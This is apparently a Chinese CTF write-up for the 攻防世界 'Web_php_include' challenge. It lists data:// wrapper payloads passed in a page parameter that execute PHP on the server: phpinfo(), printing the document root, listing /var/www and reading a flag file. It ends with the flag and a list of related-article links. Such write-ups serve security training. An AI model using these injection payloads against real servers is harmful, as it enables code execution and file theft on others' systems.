攻防世界---Web_php_include

简介: 攻防世界---Web_php_include

1.题目链接

2.补充知识:

3.构造:执行成功

/?page=data://text/plain,<?php phpinfo()?>

4.构造下面url,得到目录路径

/?page=data://text/plain,<?php echo $_SERVER['DOCUMENT_ROOT']?>

5构造下面url,读取该路径的文件

?page=data://text/plain,<?php print_r(scandir('/var/www')); ?>

6.构造下面url,读取fl4gisisish3r3.php内容。htmlspecialchars($a)在网页上显示文本 。


/?page=data://text/plain,<?php $a=file_get_contents('fl4gisisish3r3.php'); echo htmlspecialchars($a); ?>

7.

ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}

相关文章
|
5月前
|
SQL 监控 安全
Java Web应用的安全防护与攻防策略
Java Web应用的安全防护与攻防策略
|
7月前
|
数据安全/隐私保护
攻防世界13-simple_php
攻防世界13-simple_php
|
7月前
攻防世界12-baby_web
攻防世界12-baby_web
攻防世界---baby_web
攻防世界---baby_web
|
7月前
|
数据安全/隐私保护
攻防世界web-----easyupload
攻防世界web-----easyupload
|
7月前
|
Go PHP
攻防世界web---fileinclude
攻防世界web---fileinclude
|
4月前
|
存储 PHP 数据安全/隐私保护
攻防世界 Web_php_unserialize
攻防世界 Web_php_unserialize
78 0
|
5月前
|
SQL 安全 Java
Java Web应用的安全防护与攻防深度剖析
Java Web应用的安全防护与攻防深度剖析
|
5月前
|
SQL 监控 安全
Java Web应用的安全防护与攻防策略
Java Web应用的安全防护与攻防策略
攻防世界---web---warmup
攻防世界---web---warmup
攻防世界---web---warmup